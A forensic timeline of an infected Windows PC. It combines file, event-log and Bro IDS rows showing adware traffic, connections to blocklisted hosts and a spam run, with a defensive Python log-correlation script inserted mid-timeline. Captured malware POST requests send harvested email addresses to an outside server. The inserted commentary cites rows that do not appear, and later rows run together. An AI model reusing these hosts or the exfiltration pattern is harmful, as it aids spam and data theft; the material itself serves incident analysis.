02/19/09 10:21:25 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-21-57765512-1263358170-1248344978-1385 COMPUTER: HACKEDPC DESCRIPTION: The DSproct service was successfully sent a start control. -
02/19/09 10:21:37 modified senekaklpapjct.dat C:\\WINDOWS\SYSTEM32\senekaklpapjct.dat Data ASCII & Binary Code\Library ! Bad signature File, Archive
02/19/09 10:21:37 written senekaklpapjct.dat C:\\WINDOWS\SYSTEM32\senekaklpapjct.dat Data ASCII & Binary Code\Library ! Bad signature File, Archive
02/19/09 10:21:49 accessed index.dat :Host: 66.48.78.222 History\Daily -
02/19/09 10:21:49 accessed index.dat http://66.48.78.222/ron/ronz.php?sid=&numpop=2&nid=1535187396&mid=8640037421&servern=&rurl=http://popunder.adsrevenue.net/linksed.php?sn=1781235056906&uip=164.107.xxx.177&siteid=Sniper34&clater=1&serverfile=popnetwork&ref=http%3A%2F%2Fklite.ath.cx%2F&clicksor=&unsold=0&data=rSe_2%CA%D1%D3%CE%CA%D0%D3%D1%CD%D4%C7%28%24rOa%5E2%EC%2A%26%26%7B%2A%D0%CC%C3.3%FA%24b%27%2B%2C%27%C9%D0%C6%FA%FE%2B%23%FC%DA%F3%F4%E7%E4D%FE%7Dn%5D%7E%2F%E1%FD%2A%2C3%25%7E%DB%D1%BE%2BsLIoV%22%251%2F%D7%D1%C3%F9%7D.%F2%2A%7BjSls2%CC%C52%24%2A%27%26%FC%DA%CE&url=http%3A%2F%2F64.246.15.27%2Fron%2Fblank.php History\Daily -
02/19/09 10:21:54 accessed index.dat http://66.48.78.222/ron/ronz.php?sid=&numpop=2&nid=1535187396&mid=8640037463&servern=&rurl=http://popunder.adsrevenue.net/linksed.php?sn=1781235056912&uip=164.107.xxx.177&siteid=Sniper34&clater=1&serverfile=popnetwork&ref=http%3A%2F%2Fklite.ath.cx%2F&clicksor=&unsold=0&data=rSe_2%CA%D1%D3%CE%CA%D0%D3%D1%CE%D0%C7%29+rOa%5E2%EC%2A%26%26%7B%2A%D0%CC%C3.3%FB+b%27%2B%2C%27%C9%D0%C6%FA%FE%2B%23%FC%DA%F3%F4%E8%E0D%FE%7Dn%5D%7E%2F%E1%FD%2A%2C3%25%7E%DB%D1%BF%27sLIoV%22%251%2F%D7%D1%C3%F9%7D.%F2%2B%FBjSls2%CC%C52%24%2A%27%26%FC%DA%CE&url=http%3A%2F%2F64.246.15.27%2Fron%2Fblank.php History\Daily -
02/19/09 10:22:35 accessed index.dat http://66.48.78.222/ron/ronz.php?sid=&numpop=2&nid=1535187396&mid=8640037540&servern=&rurl=http://popunder.adsrevenue.net/linksed.php?sn=1781235056920&uip=164.107.xxx.177&siteid=Sniper34&clater=1&serverfile=popnetwork&ref=http%3A%2F%2Fklite.ath.cx%2F&clicksor=&unsold=0&data=rSe_2%CA%D1%D3%CE%CA%D0%D3%D1%CF%CE%C7%2A%7DrOa%5E2%EC%2A%26%26%7B%2A%D0%CC%C3.3%FC%7Db%27%2B%2C%27%C9%D0%C6%FA%FE%2B%23%FC%DA%F3%F4%E9%DED%FE%7Dn%5D%7E%2F%E1%FD%2A%2C3%25%7E%DB%D1%C0%25sLIoV%22%251%2F%D7%D1%C3%F9%7D.%F2%2C%F9jSls2%CC%C52%24%2A%27%26%FC%DA%CE&url=http%3A%2F%2F64.246.15.27%2Fron%2Fblank.php History\Daily -
02/19/09 10:22:39 accessed index.dat :Host: yourtrafficserver.com History\Daily -
02/19/09 10:22:39 accessed index.dat http://yourtrafficserver.com History\Daily -
02/19/09 10:22:50 bro no=ConnectionWithSpamHausDropNet na=NOTICE_ALARM_ALWAYS es=node03.1 sa=164.107.xxx.177 sp=1474/tcp da=91.211.65.76 dp=80/tcp msg=164.107.xxx.177\ had\ a\ connection\ with\ a\ SpamHaus\ DROP\ list\ host tag=@83-10576-6264ad
02/19/09 10:22:57 bro
02/19/09 10:23:00 bro
02/19/09 10:23:00 accessed index.dat :Host: www.hotelrooms.com History\Daily -
02/19/09 10:23:00 accessed index.dat http://www.hotelrooms.com/cgi-bin/search/index.plx?ID=1185303433 History\Daily -
02/19/09 10:23:00 accessed [email protected][1].txt hotelinternetstrategies.122.2o7.net/ Cookies -
02/19/09 10:23:00 accessed smith.99999@lacasaquecanta[2].txt lacasaquecanta.com/ Cookies -
02/19/09 10:23:13 accessed index.dat :Host: www.google.com History\Daily -
02/19/09 10:23:18 logged SysEvent.Evt EVENT ID: 1 EVENT TYPE: ERROR EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The System Restore filter encountered the unexpected error '0xC0000001' while processing the file '' on the volume 'Disk0'. It has stopped monitoring the volume. -
02/19/09 10:23:19 bro
02/19/09 10:23:21 bro no=ProtocolFound na=NOTICE_FILE es=node04.1 sa=164.107.xxx.177 sp=2145/tcp da=216.195.62.100 dp=2084/tcp num=16 msg=164.107.xxx.177/2145\ >\ 216.195.62.100/2084\ Apache\ (via\ HTTP)\ on\ port\ 2084/tcp sub=Apache\ (via\ HTTP) tag=@83-10576-62725d
02/19/09 10:23:54 bro no=ProtocolViolation na=NOTICE_FILE es=node02.1 sa=164.107.xxx.177 sp=2684/tcp da=202.224.39.235 dp=25/tcp num=30 msg=164.107.xxx.177/2684\ >\ 202.224.39.235/smtp\ analyzer\ SMTP\ disabled\ due\ to\ protocol\ violation\ [debug:\ service\=other] sub=reply\ code\ -1\ out\ of\ range\ [50] tag=@83-10576-6281eb
02/19/09 10:24:58 accessed index.dat :Host: www.yahoo.com History\Daily -
02/19/09 10:25:00 created [email protected][2].txt ad.yieldmanager.com/ Cookies -
02/19/09 10:25:07 bro no=ProtocolFound na=NOTICE_FILE es=node04.1 sa=164.107.xxx.177 sp=4702/tcp da=216.195.62.100 dp=2084/tcp num=16 msg=164.107.xxx.177/4702\ >\ 216.195.62.100/2084\ Apache\ (via\ HTTP)\ on\ port\ 2084/tcp sub=Apache\ (via\ HTTP) tag=@83-10576-62a3c0
02/19/09 10:25:15 bro no=ProtocolFound na=NOTICE_FILE es=node04.1 sa=164.107.xxx.177 sp=4809/tcp da=216.195.62.100 dp=2084/tcp num=16 msg=164.107.xxx.177/4809\ >\ 216.195.62.100/2084\ Apache\ (via\ HTTP)\ on\ port\ 2084/tcp sub=Apache\ (via\ HTTP) tag=@83-10576-62a6fd
02/19/09 10:26:50 accessed index.dat :Host: oca.microsoft.com History\Daily -
02/19/09 10:26:50 accessed index.dat http://oca.microsoft.com/en/dcp20.asp History\Daily -
02/19/09 10:26:52 logged SysEvent.Evt EVENT ID: 7034 EVENT TYPE: ERROR EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The CcEvtSvc service terminated unexpectedly. It has done this 1 time(s). -
02/19/09 10:26:56 created [email protected][2].txt ad.yieldmanager.com/ Cookies -
02/19/09 10:26:56 created [email protected][1].txt www.yahoo.com/ Cookies -
02/19/09 10:26:56 created system@yahoo[1].txt yahoo.com/ Cookies -
02/19/09 10:27:11 accessed index.dat http://webcal.vip.ohio-state.edu/fcgi-bin/swc/lexacal.fcgi?go=login&time_out=on&ada=off History\Daily -
02/19/09 10:27:24 bro no=ProtocolFound na=NOTICE_FILE es=node04.1 sa=164.107.xxx.177 sp=3093/tcp da=216.195.62.100 dp=2084/tcp num=16 msg=164.107.xxx.177/3093\ >\ 216.195.62.100/2084\ Apache\ (via\ HTTP)\ on\ port\ 2084/tcp sub=Apache\ (via\ HTTP) tag=@83-10576-62dfd6
02/19/09 10:28:20 bro no=FastFluxSUB12A na=NOTICE_ALARM_ALWAYS es=node05.0 sa=164.107.xxx.177 sp=1035/udp da=207.44.136.106 dp=53/udp msg=\ threshold\ exceeded\ for\ pjpdata-com.relay1c.spamh.com\ SUB:\ 3\ 0.00925925925925925 tag=@be-9e69-877ee
02/19/09 10:28:46 accessed index.dat http://www.yahoo.com History\Daily -
02/19/09 10:28:46 accessed [email protected][1].txt www.yahoo.com/ Cookies -
02/19/09 10:28:47 accessed index.dat http://www.yahoo.com History\Visited Link -
02/19/09 10:28:55 bro no=ProtocolFound na=NOTICE_FILE es=node04.1 sa=164.107.xxx.177 sp=4720/tcp da=216.195.62.100 dp=2084/tcp num=16 msg=164.107.xxx.177/4720\ >\ 216.195.62.100/2084\ Apache\ (via\ HTTP)\ on\ port\ 2084/tcp sub=Apache\ (via\ HTTP) tag=@83-10576-6306e7
02/19/09 10:28:58 bro no=ProtocolFound na=NOTICE_FILE es=node04.1 sa=164.107.xxx.177 sp=4760/tcp da=216.195.62.100 dp=2084/tcp num=16 msg=164.107.xxx.177/4760\ >\ 216.195.62.100/2084\ Apache\ (via\ HTTP)\ on\ port\ 2084/tcp sub=Apache\ (via\ HTTP) tag=@83-10576-6307fc
02/19/09 10:29:03 accessed system@yahoo[1].txt yahoo.com/ Cookies -
02/19/09 10:29:26 accessed [email protected][2].txt ad.yieldmanager.com/ Cookies -
164.107.xxx.177:1652 > 69.46.16.191:80 POST data: os=2600&ver=2.0.5&idx=cdb30140-ebb8-11d8-a4a8-806d6172696f&user=co&ioctl=10&[email protected]^M^[email protected]^M^[email protected]^M^[email protected]^M^[email protected]^M^[email protected]^M ^[email protected]^M^[email protected]^M^[email protected]^M^[email protected]^M^J^M^J User-Agent: User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Referrer: Proxied for:
164.107.xxx.177:2315 > 69.46.16.191:80 POST data: os=2600&ver=2.0.5&idx=cdb30140-ebb8-11d8-a4a8-806d6172696f&user=co&ioctl=10&[email protected]^M^[email protected]^M^[email protected]^M^[email protected]^M^[email protected]^M^[email protected]^M^[email protected]^M^[email protected]^M^[email protected]^M^[email protected]^M^J^M^J User-Agent: User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Referrer: Proxied for:
164.107.xxx.177:3252 > 69.46.16.191:80 POST data: os=2600&ver=2.0.5&idx=cdb30140-ebb8-11d8-a4a8-806d6172696f&user=co&ioctl=10&[email protected]^M^[email protected]^M^[email protected]^M^[email protected]^M^[email protected]^M ^[email protected]^M^[email protected]^M^[email protected]^M^[email protected]^M^[email protected]^M^J^M^J User-Agent: User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Referrer: Proxied for:
164.107.xxx.177:1629 > 69.46.16.191:80 POST data: os=2600&ver=2.0.5&idx=cdb30140-ebb8-11d8-a4a8-806d6172696f&user=co&ioctl=10&[email protected]^M^[email protected]^M^[email protected]^M^[email protected]^M ^[email protected]^M^[email protected]^M^[email protected]^M^[email protected]^M^[email protected]^M^[email protected]^M^J^M^J User-Agent: User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Referrer: Proxied for:
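The rows above interleave three evidence sources (file-system timestamps, SysEvent.Evt entries and Bro notices) and the analyst's comments mark where they line up: the firewall service stops, Bro flags an executable served as abb.txt, and new executables appear in SYSTEM32 within the same few seconds; later the tcp/25 ProtocolViolation notices precede the "spam starts" comment. The following Python script is an added example and is not code from the original timeline or its author. It parses rows in the layout shown above (the row format "MM/DD/YY H:MM:SS activity name details" and the Bro key=value layout with backslash-escaped spaces are assumptions taken from those rows), then correlates each HTTP_IncorrectFileType notice with files created around it, lists which services had entered the stopped state before that download, and collects the tcp/25 peers where Bro disabled its SMTP analyzer. The sample rows are constructed and abbreviated from values that appear above.

```python
"""Correlate Bro notices with file-system and event-log rows of a timeline.

Added example, not the original timeline's tooling. The row layout and the
Bro notice layout (key=value pairs, spaces inside a value escaped with a
backslash) are assumed from the rows shown in the timeline.
"""
import re
from datetime import datetime, timedelta

# Constructed sample rows, modelled on (and abbreviated from) the timeline.
SAMPLE = r"""
02/19/09 10:03:10 logged SysEvent.Evt EVENT ID: 7036 DESCRIPTION: The Windows Firewall/Internet Connection Sharing (ICS) service entered the stopped state. -
02/19/09 10:03:14 created abb[1].txt C:\\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\QXLU2P44\abb[1].txt
02/19/09 10:03:14 created services.exe C:\\WINDOWS\services.exe
02/19/09 10:03:17 bro no=HTTP_IncorrectFileType na=NOTICE_ALARM_ALWAYS sa=164.107.xxx.177 sp=2293/tcp da=211.95.79.6 dp=80/tcp method=GET url=http://thaexp.cn/dll/abb.txt msg=application/x-dosexec\ GET\ http://thaexp.cn/dll/abb.txt
02/19/09 10:03:17 created reader_s.exe C:\\WINDOWS\SYSTEM32\reader_s.exe
02/19/09 10:05:08 bro no=ProtocolFound na=NOTICE_FILE sa=164.107.xxx.177 sp=2335/tcp da=216.195.58.113 dp=2085/tcp msg=Apache\ (via\ HTTP)
02/19/09 10:23:54 bro no=ProtocolViolation na=NOTICE_FILE sa=164.107.xxx.177 sp=2684/tcp da=202.224.39.235 dp=25/tcp msg=analyzer\ SMTP\ disabled\ due\ to\ protocol\ violation
02/19/09 10:32:06 bro no=ProtocolViolation na=NOTICE_FILE sa=164.107.xxx.177 sp=2383/tcp da=68.178.201.225 dp=25/tcp msg=analyzer\ SMTP\ disabled\ due\ to\ protocol\ violation
"""

ROW_RE = re.compile(r"^(\d\d/\d\d/\d\d \d{1,2}:\d\d:\d\d) (\S+) (.*)$")
# A Bro value runs to the next unescaped whitespace; backslash-space is a literal space.
KV_RE = re.compile(r"(\w+)=((?:\\.|\S)*)")
EVENT_RE = re.compile(r"EVENT ID: (\d+) .*DESCRIPTION: (.*?) -?$")


def parse_notice(text):
    """Parse Bro key=value pairs into a dict, removing the backslash escapes."""
    return {k: re.sub(r"\\(.)", r"\1", v) for k, v in KV_RE.findall(text)}


def parse_rows(text):
    """Parse timeline rows; 'bro' rows additionally get a parsed 'notice' dict."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if not m:
            continue  # blank line or a wrapped fragment without a timestamp
        stamp, activity, rest = m.groups()
        row = {"ts": datetime.strptime(stamp, "%m/%d/%y %H:%M:%S"),
               "activity": activity, "rest": rest}
        if activity == "bro":
            row["notice"] = parse_notice(rest)
        else:
            row["name"], _, row["details"] = rest.partition(" ")
        rows.append(row)
    return rows


def files_created_near_notices(rows, window=timedelta(seconds=10)):
    """Map each HTTP_IncorrectFileType notice URL to files created within the window.

    Bro raises this notice when an executable MIME type is served under a
    non-executable URL (here .txt); files appearing on disk in the same few
    seconds are the candidates that download produced.
    """
    result = {}
    for r in rows:
        notice = r.get("notice", {})
        if notice.get("no") != "HTTP_IncorrectFileType":
            continue
        result[notice["url"]] = [
            x["name"] for x in rows
            if x["activity"] == "created" and abs(x["ts"] - r["ts"]) <= window]
    return result


def services_stopped_before(rows, ts):
    """Names from 7036 'entered the stopped state' events logged at or before ts."""
    stopped = []
    for r in rows:
        if r["activity"] != "logged" or r["ts"] > ts:
            continue
        m = EVENT_RE.search(r["rest"])
        if m and m.group(1) == "7036" and "stopped state" in m.group(2):
            stopped.append(m.group(2).split(" service entered")[0].removeprefix("The "))
    return stopped


def smtp_violation_hosts(rows):
    """Distinct tcp/25 peers where Bro disabled its SMTP analyzer: a spam-run signal."""
    return sorted({r["notice"]["da"] for r in rows
                   if r.get("notice", {}).get("no") == "ProtocolViolation"
                   and r["notice"].get("dp") == "25/tcp"})


if __name__ == "__main__":
    rows = parse_rows(SAMPLE)
    download = next(r for r in rows if r.get("notice", {}).get("no") == "HTTP_IncorrectFileType")
    for url, names in files_created_near_notices(rows).items():
        print(f"{url} -> {names}")
    print("stopped before the download:", services_stopped_before(rows, download["ts"]))
    print("tcp/25 protocol violations to:", smtp_violation_hosts(rows))
```

Run against the full timeline, the same three functions reproduce the analyst's comments mechanically: the firewall stop precedes the flagged download, reader_s.exe and the .tmp files sit inside the window, and the distinct tcp/25 destinations grow from one to the thousands of redacted entries.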
02/19/09 10:30:23 modified MPNOTIFY.EXE C:\\WINDOWS\SYSTEM32\MPNOTIFY.EXE Windows Executable Code\Executable File, Archive
02/19/09 10:30:38 accessed WGATRAY.EXE-350D4455.pf C:\WINDOWS\Prefetch\WGATRAY.EXE-350D4455.pf
02/19/09 10:30:38 written WGATRAY.EXE-350D4455.pf C:\WINDOWS\Prefetch\WGATRAY.EXE-350D4455.pf
02/19/09 10:30:38 modified WGATRAY.EXE-350D4455.pf C:\WINDOWS\Prefetch\WGATRAY.EXE-350D4455.pf
02/19/09 10:30:39 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service was successfully sent a start control. -
02/19/09 10:30:39 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the running state. -
02/19/09 10:30:44 accessed index.dat http://www.google.com History\Daily -
02/19/09 10:30:46 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the stopped state. -
02/19/09 10:30:51 spam!
02/19/09 10:30:52 bro no=ProtocolFound na=NOTICE_FILE es=node03.1 sa=164.107.xxx.177 sp=2040/tcp da=216.195.58.113 dp=2085/tcp num=16 msg=164.107.xxx.177/2040\ >\ 216.195.58.113/2085\ Apache\ (via\ HTTP)\ on\ port\ 2085/tcp sub=Apache\ (via\ HTTP) tag=@83-10576-633e25
02/19/09 10:30:54 bro
02/19/09 10:30:54 bro 3435 log entries about spamming redacted :-)
02/19/09 10:31:01 accessed SMAX4PNP.EXE-1CC48B49.pf C:\WINDOWS\Prefetch\SMAX4PNP.EXE-1CC48B49.pf
02/19/09 10:31:01 written SMAX4PNP.EXE-1CC48B49.pf C:\WINDOWS\Prefetch\SMAX4PNP.EXE-1CC48B49.pf
02/19/09 10:31:01 modified SMAX4PNP.EXE-1CC48B49.pf C:\WINDOWS\Prefetch\SMAX4PNP.EXE-1CC48B49.pf
02/19/09 10:31:02 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service was successfully sent a start control. -
02/19/09 10:31:03 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the running state. -
02/19/09 10:31:06 accessed SGTRAY.EXE-31581176.pf C:\WINDOWS\Prefetch\SGTRAY.EXE-31581176.pf
02/19/09 10:31:06 written SGTRAY.EXE-31581176.pf C:\WINDOWS\Prefetch\SGTRAY.EXE-31581176.pf
02/19/09 10:31:06 modified SGTRAY.EXE-31581176.pf C:\WINDOWS\Prefetch\SGTRAY.EXE-31581176.pf
02/19/09 10:31:07 accessed TFSWCTRL.EXE-2D67C816.pf C:\WINDOWS\Prefetch\TFSWCTRL.EXE-2D67C816.pf
02/19/09 10:31:07 written TFSWCTRL.EXE-2D67C816.pf C:\WINDOWS\Prefetch\TFSWCTRL.EXE-2D67C816.pf
02/19/09 10:31:07 modified TFSWCTRL.EXE-2D67C816.pf C:\WINDOWS\Prefetch\TFSWCTRL.EXE-2D67C816.pf
02/19/09 10:31:12 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the stopped state. -
02/19/09 10:31:46 logged SysEvent.Evt EVENT ID: 26 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: Application popup: TransferAgent.exe - Application Error : The application failed to initialize properly (0xc000007b). Click on OK to terminate the application. -
02/19/09 10:32:06 bro no=ProtocolViolation na=NOTICE_FILE es=node23 sa=164.107.xxx.177 sp=2383/tcp da=68.178.201.225 dp=25/tcp num=30 msg=164.107.xxx.177/2383\ >\ 68.178.201.225/smtp\ analyzer\ SMTP\ disabled\ due\ to\ protocol\ violation\ [debug:\ service\=other] sub=reply\ code\ -1\ out\ of\ range\ [ERROR:\ ld.so:\ object\ '/tmp/getuid.so'\ fr...] tag=@83-10576-636084
02/19/09 10:32:26 accessed index.dat file:///C:/Program Files/AWS/WeatherBug/Local/bot_loading.html History\Daily -
02/19/09 10:32:32 accessed index.dat https://edit.yahoo.com/registration History\Visited Link -
02/19/09 10:32:34 logged SysEvent.Evt EVENT ID: 4226 EVENT TYPE: WARNING EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: TCP/IP has reached the security limit imposed on the number of concurrent TCP connect attempts. -
02/19/09 10:32:37 created smith.99999@weatherbug[1].txt weatherbug.com/ Cookies -
02/19/09 10:32:38 accessed index.dat file:///C:/Program Files/AWS/WeatherBug/Local/center_loading.html History\Daily -
02/19/09 10:32:39 accessed index.dat http://deskwx.weatherbug.com/WeatherWindow/WeatherWindow.html?lvl=0&zip=43204&con1=111&sunr=1235045940&suns=1235085120&ut=1235057547&stat=KTZR&L1=535&ver=6.07&camera_id=&ccamzip=<a=<at=<az=&sed=0&lpt=1235048003&rnd=11942&&&&vcw=453&lvw=1210334133&lvd=1209989319&dosp=0&UA1=506&UA5=506&zcode=Z5264&showgutsads=1&screen_x=1152&screen_y=804&lvr=&lvu=&wpt=&A2=171&lvh=&wat=1235056820&A1=50500&dsr=506&dsu=506&dssp=-1&dspm=-1&pmls=1234184569&D3=3&UA3=-1&UA11=&UA15=&L4=23&UA16=&ui=0&n=506267455&alid=0&u=&LRR=&L3=OH History\Daily -
02/19/09 10:32:40 created smith.99999@tacoda[3].txt tacoda.net/ Cookies -
02/19/09 10:32:48 created smith.99999@doubleclick[1].txt doubleclick.net/ Cookies -
02/19/09 10:32:50 accessed index.dat http://deskwx.weatherbug.com/WeatherWindow/WeatherWindow.html?lvl=0&zip=43204&con1=111&sunr=1235045940&suns=1235085120&ut=1235057559&stat=KTZR&L1=535&ver=6.07&camera_id=&ccamzip=<a=<at=<az=&sed=0&lpt=1235048003&rnd=14604&&&&vcw=454&lvw=1210334133&lvd=1209989319&dosp=0&UA1=506&UA5=506&zcode=Z5264&showgutsads=1&screen_x=1152&screen_y=804&lvr=&lvu=&wpt=&A2=171&lvh=&wat=1235057523&A1=50500&dsr=506&dsu=506&dssp=-1&dspm=-1&pmls=1234184569&D3=3&UA3=-1&UA11=&UA15=&L4=23&UA16=&ui=1&n=506267455&alid=0&u=&LRR=&L3=OH History\Daily -
02/19/09 10:32:51 accessed index.dat http://pub.weatherbug.com/RealMedia/ads/adstream_sx.cgi/www.wbug.com/HM/3902@lb1?_RM_HTML_KEYWORDZ3_=43204&_RM_HTML_KEYWORDWO1_=21.20&_RM_HTML_KEYWORDL2_=Columbus&_RM_HTML_KEYWORDL3_=OH&_RM_HTML_KEYWORDHO1_=0.50&_RM_HTML_KEYWORDPC_=Z5264&A1=50500&A2=171&D1=2&D3=3&FC1=111&FC2=4&FC3=40&HO1=0.50&HO4=Mixed Trace.&L1=535&L2=Columbus&L3=OH&L4=23&N=506267455&Nav1=HM&Nav2=HM_Unknown&PC=Z5264&S2=&S3=0&SP1=&SP2=&SP5=-1&TW3=&UA1=506&WO1=21.20&WO3=0&WO4=58.00&Z3=43204& History\Daily -
02/19/09 10:32:58 accessed index.dat http://pub.weatherbug.com/RealMedia/ads/adstream_sx.cgi/www.wbug.com/HM/153@lb1?_RM_HTML_KEYWORDZ3_=43204&_RM_HTML_KEYWORDWO1_=21.20&_RM_HTML_KEYWORDL2_=Columbus&_RM_HTML_KEYWORDL3_=OH&_RM_HTML_KEYWORDHO1_=0.50&_RM_HTML_KEYWORDPC_=Z5264&A1=50500&A2=171&D1=2&D3=3&FC1=111&FC2=4&FC3=40&HO1=0.50&HO4=Mixed Trace.&L1=535&L2=Columbus&L3=OH&L4=23&N=506267455&Nav1=HM&Nav2=HM_Unknown&PC=Z5264&S2=&S3=0&SP1=&SP2=&SP5=-1&TW3=&UA1=506&WO1=21.20&WO3=0&WO4=58.00&Z3=43204& History\Daily -
02/19/09 10:33:22 accessed [email protected][1].txt serving.adsrevenue.clicksor.net/ Cookies -
02/19/09 10:33:22 created [email protected][1].txt serving.adsrevenue.clicksor.net/ Cookies -
02/19/09 10:33:23 created smith.99999@adsrevenue[2].txt adsrevenue.net/ Cookies -
02/19/09 10:33:24 created smith.99999@adsrevenue[2].txt adsrevenue.net/ Cookies -
02/19/09 10:33:29 created [email protected][1].txt 66.221.37.124/ Cookies -
02/19/09 10:33:30 created
[email protected][1].txt 66.221.37.124/ Cookies -02/19/09 10:33:40 created [email protected][2].txtwww.advertyz.com/ Cookies -02/19/09 10:33:45 accessed index.dat http://klite.ath.cx History\Daily -02/19/09 10:34:06 created system@atdmt[1].txt atdmt.com/ Cookies -02/19/09 10:34:06 created [email protected][1].txt c.live.com/ Cookies -02/19/09 10:34:06 created [email protected][1].txtcouponbar.coupons.com/ Cookies -02/19/09 10:34:06 created [email protected][2].txt home.live.com/ Cookies -02/19/09 10:34:06 created system@live[2].txt live.com/ Cookies -02/19/09 10:34:06 created [email protected][1].txt login.live.com/ Cookies -02/19/09 10:34:06 created system@msn[1].txt msn.com/ Cookies -02/19/09 10:34:06 created [email protected][1].txt p.live.com/ Cookies -02/19/09 10:34:06 created system@quantserve[2].txt quantserve.com/ Cookies -02/19/09 10:34:06 created [email protected][2].txt rad.live.com/ Cookies -02/19/09 10:34:06 created [email protected][1].txt signup.live.com/ Cookies -02/19/09 10:34:06 created smith.99999@bronsonestopshop[1].txtbronsonestopshop.com/ Cookies -02/19/09 10:34:06 created smith.99999@dupontsupercenter[1].txtdupontsupercenter.com/ Cookies -02/19/09 10:34:06 created smith.99999@easymoneywith6[1].txteasymoneywith6.com/ Cookies -02/19/09 10:34:06 created smith.99999@garciaworldshopping[1].txtgarciaworldshopping.com/ Cookies -02/19/09 10:34:06 created smith.99999@hafbargainmall[1].txthafbargainmall.com/ Cookies -02/19/09 10:34:06 created smith.99999@homecybermall[1].txthomecybermall.com/ Cookies -02/19/09 10:34:06 created smith.99999@klywebmall[1].txt klywebmall.com/ Cookies -02/19/09 10:34:06 created smith.99999@kpbmarketing[1].txtkpbmarketing.com/ Cookies -02/19/09 10:34:06 created [email protected][1].txtload.exelator.com/load/ Cookies -02/19/09 10:34:06 created smith.99999@micksmarketplace[1].txtmicksmarketplace.com/ Cookies -02/19/09 10:34:06 created smith.99999@paulwebmall[1].txtpaulwebmall.com/ Cookies -02/19/09 10:34:06 created 
smith.99999@popunderadvertise[2].txtpopunderadvertise.com/ Cookies -02/19/09 10:34:06 created smith.99999@pro-market[2].txt pro-market.net/ Cookies -02/19/09 10:34:06 created smith.99999@sharmanshoppingcenter[1].txtsharmanshoppingcenter.com/ Cookies -02/19/09 10:34:06 created smith.99999@shopfrhomestore[1].txtshopfrhomestore.com/ Cookies -02/19/09 10:34:06 created smith.99999@stephanusonestop[1].txtstephanusonestop.com/ Cookies -02/19/09 10:34:06 created smith.99999@surrettshoppingcenter[1].txtsurrettshoppingcenter.com/ Cookies -02/19/09 10:34:06 created smith.99999@toyowebmall[1].txttoyowebmall.com/ Cookies -02/19/09 10:34:06 created smith.99999@wilsonfindings77[1].txtwilsonfindings77.com/ Cookies -02/19/09 10:34:06 created [email protected][2].txtwww.advertyz.com/ Cookies -02/19/09 10:34:06 created smith.99999@zedo[2].txt zedo.com/ Cookies -02/19/09 10:34:10 accessed index.dat https://signup.live.com/Redirect.aspx?mkt=en-us&rollrs=12&lic=1&sutk=1235057632640&wa=wsignin1.0History\Visited Link -02/19/09 10:34:10 accessed [email protected][1].txt login.live.com/ Cookies -02/19/09 10:34:11 accessed index.dat https://login.live.com/ppsecure/post.srf?wa=wsignin1.0&rpsnv=10&ct=1235057645&rver=5.5.4177.0&wp=MBI_SSL&wreply=https://signup.live.com/Redirect.aspx?mkt=en-us&rollrs=12&lic=1&sutk=1235057632640&lc=1033&id=68692&slt=B1yRQXXJ*aFcLPgVingrbnFQrXlcxyJ3RVev8NrY*EDGTMx!4gz79HMaETAUcRnmk5F!Lb*JpOFcWuad0NKHGptlODnpnKxzErxWAGrplokR0kktq3s3r1m4dSwJHistory\Visited Link -02/19/09 10:34:13 accessed [email protected][2].txt home.live.com/ Cookies -02/19/09 10:34:26 accessed [email protected][1].txt p.live.com/ Cookies -02/19/09 10:34:34 accessed index.dat http://sup.live.com/WhatsNew/WNFeed.aspx?cid=e93b3cb24497333b&key=23256283-1a41-41a9-9a42-a9d07e52b391&mkt=en-USHistory\Visited Link -02/19/09 10:34:36 accessed index.dat :Host: home.live.com History\Daily -02/19/09 10:34:36 accessed index.dat http://home.live.com History\Daily -02/19/09 10:34:36 accessed index.dat 
http://home.live.com History\Visited Link -02/19/09 10:34:36 accessed [email protected][1].txt c.live.com/ Cookies -02/19/09 10:34:36 accessed system@msn[1].txt msn.com/ Cookies -02/19/09 10:34:36 accessed [email protected][2].txt rad.live.com/ Cookies -02/19/09 10:34:40 accessed system@quantserve[2].txt quantserve.com/ Cookies -02/19/09 10:34:41 accessed system@atdmt[1].txt atdmt.com/ Cookies -02/19/09 10:34:49 accessed index.dat http://www.google.com History\Daily -02/19/09 10:34:49 accessed index.dat http://www.google.com History\Visited Link -02/19/09 10:34:54 bro no=ProtocolFound na=NOTICE_FILE es=node03.1 sa=164.107.xxx.177 sp=1532/tcp da=216.195.58.113 dp=2085/tcp num=16 msg=164.107.xxx.177/1532\ >\ 216.195.58.113/2085\ Apache\ (via\ HTTP)\ on\ port\ 2085/tcp sub=Apache\ (via\ HTTP) tag=@83-10576-63ae7602/19/09 10:34:55 accessed system@google[1].txt google.com/ Cookies -02/19/09 10:34:57 bro no=ProtocolFound na=NOTICE_FILE es=node03.1 